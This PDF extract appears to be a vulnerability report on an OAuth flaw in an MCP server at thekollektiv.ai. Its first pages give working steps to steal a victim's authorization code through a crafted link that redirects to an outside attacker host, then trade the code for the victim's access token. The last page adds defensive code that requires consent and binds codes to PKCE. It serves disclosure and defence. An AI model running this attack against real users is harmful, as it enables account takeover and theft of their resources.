# kollektiv_vulnerability.pdf
## Metadata
- PDFFormatVersion=1.3
- IsLinearized=false
- IsAcroFormPresent=false
- IsXFAPresent=false
- IsCollectionPresent=false
- IsSignaturesPresent=false
- Producer=macOS 版本14.0(版号23A344) Quartz PDFContext
- CreationDate=D:20250515053113Z00'00'
- ModDate=D:20250515053113Z00'00'
## Contents
### Page 1
1. First, use the register API to register an evil `client_id`.
2. Then we can use JavaScript code to generate a PKCE pair, like below:

```javascript
{
  code_verifier: 'zJu_u20q542vkqHg790nzV4VkflNY023Qzx1ENFRZqk',
  code_challenge: 'ogH32ysf0wlQY8KKJOGf1s5IWwtKoa1eEq-bMVTbqpg'
}
```

3. Then we replace the `client_id`, `redirect_uri` and `code_challenge` to generate an evil link. This is the original link:

   https://mcp.thekollektiv.ai/authorize?response_type=code&client_id=q8WxVGfcGqFUG0vd&code_challenge=4kZ8ithQ_6gxonAkD_bV6Mi8PC3bHhQEGIxGxd1rDVM&code_challenge_method=S256&redirect_uri=http%3A%2F%2F127.0.0.1%3A6274%2Foauth%2Fcallback

   And below is the evil link:

   https://mcp.thekollektiv.ai/authorize?response_type=code&client_id=HgYqLWh9OmedD8LJ&code_challenge=ogH32ysf0wlQY8KKJOGf1s5IWwtKoa1eEq-bMVTbqpg&code_challenge_method=S256&redirect_uri=http%3A%2F%2Fexp.azraelxuemo.cn%3A9876%2Foauth%2Fcallback

### Page 2

4. Start an HTTP server to receive the code:

```shell
python3 -m http.server 9876
```

5. Send the link to the victim. Once the victim clicks the link, we get the code.
6. Get the token. Replace the `code`, `code_verifier`, `redirect_uri` and `client_id`, and we get a valid `access_token` as the victim's identity. Then we can use the MCP Client tool to visit the victim's resources.

### Page 3
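The steps above hinge on the authorization server issuing a code to a freshly registered client as soon as a logged-in user opens the link, and on the token endpoint accepting whatever `client_id`, `redirect_uri` and `code_verifier` the caller supplies. The following is an added example, not code from the report or from the Kollektiv project: a small in-memory authorization server that requires an explicit, per-user consent decision for each (client, redirect target) pair before issuing a code, audit-logs consent prompts for dynamically registered clients whose redirect host is not loopback, and binds each code to its client, redirect URI and PKCE challenge for single use at the token endpoint. All client ids, hosts, users and log formats are constructed for the example.

```python
"""Added example: consent-gated code issuance with PKCE binding (hypothetical
in-memory OAuth authorization server, not the Kollektiv implementation)."""
import base64
import hashlib
import ipaddress
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit


def s256(code_verifier: str) -> str:
    """PKCE S256 transform: base64url(sha256(verifier)) without '=' padding."""
    digest = hashlib.sha256(code_verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def is_loopback(uri: str) -> bool:
    """True when the redirect target is the user's own machine (e.g. 127.0.0.1)."""
    host = urlsplit(uri).hostname or ""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


@dataclass
class Client:
    client_id: str
    redirect_uris: frozenset
    dynamically_registered: bool


@dataclass
class AuthServer:
    clients: dict = field(default_factory=dict)
    consents: set = field(default_factory=set)   # (user, client_id, redirect_uri)
    codes: dict = field(default_factory=dict)    # code -> (user, client, uri, challenge)
    audit: list = field(default_factory=list)    # constructed audit log lines

    def register(self, client_id, redirect_uris, dynamic=True):
        self.clients[client_id] = Client(client_id, frozenset(redirect_uris), dynamic)

    def grant_consent(self, user, client_id, redirect_uri):
        """Record the user's explicit approval given on a consent page."""
        self.consents.add((user, client_id, redirect_uri))

    def authorize(self, user, client_id, redirect_uri, code_challenge):
        client = self.clients.get(client_id)
        if client is None:
            return {"error": "unknown_client"}
        # Exact string comparison with the registered set; no prefix matching.
        if redirect_uri not in client.redirect_uris:
            return {"error": "invalid_redirect_uri"}
        # Never auto-approve: without a recorded consent for this exact client
        # and redirect target the user must be shown who is asking and where
        # the code will be sent. Non-loopback targets of dynamically registered
        # clients are additionally logged for detection.
        if (user, client_id, redirect_uri) not in self.consents:
            host = urlsplit(redirect_uri).hostname
            if client.dynamically_registered and not is_loopback(redirect_uri):
                self.audit.append(f"consent_prompt user={user} client_id={client_id} "
                                  f"redirect_host={host} dynamic_client=1 loopback=0")
            return {"error": "consent_required", "client_id": client_id,
                    "redirect_host": host}
        code = secrets.token_urlsafe(32)
        self.codes[code] = (user, client_id, redirect_uri, code_challenge)
        return {"code": code}

    def token(self, code, client_id, redirect_uri, code_verifier):
        binding = self.codes.pop(code, None)          # single use
        if binding is None:
            return {"error": "invalid_grant"}
        user, bound_client, bound_redirect, challenge = binding
        if client_id != bound_client or redirect_uri != bound_redirect:
            return {"error": "invalid_grant"}
        if not secrets.compare_digest(s256(code_verifier), challenge):
            return {"error": "invalid_grant"}
        return {"access_token": secrets.token_urlsafe(32), "sub": user}


def demo():
    """Walk the flow with constructed clients and return every outcome."""
    srv = AuthServer()
    srv.register("inspector", ["http://127.0.0.1:6274/oauth/callback"])
    tp_uri = "http://third-party.example:9876/oauth/callback"
    srv.register("third-party", [tp_uri])
    verifier = secrets.token_urlsafe(32)
    challenge = s256(verifier)
    # A logged-in user opens a link for a client they never approved: no code.
    first = srv.authorize("alice", "third-party", tp_uri, challenge)
    # A redirect target that is not registered for the client: rejected outright.
    bad_uri = srv.authorize("alice", "third-party", "http://other.example/cb", challenge)
    srv.grant_consent("alice", "third-party", tp_uri)
    issued = srv.authorize("alice", "third-party", tp_uri, challenge)
    tok = srv.token(issued["code"], "third-party", tp_uri, verifier)
    replay = srv.token(issued["code"], "third-party", tp_uri, verifier)
    return {"first": first, "bad_uri": bad_uri, "token": tok,
            "replay": replay, "audit": srv.audit}
```

Run `demo()` to see the four outcomes: the first authorization attempt returns `consent_required` and leaves one audit line naming the non-loopback redirect host, the unregistered redirect URI is refused, the code is redeemable exactly once with the matching verifier, and a replay of the same code fails. The consent tuple deliberately includes the redirect URI, so approving a client once does not let a later registration change where codes are delivered.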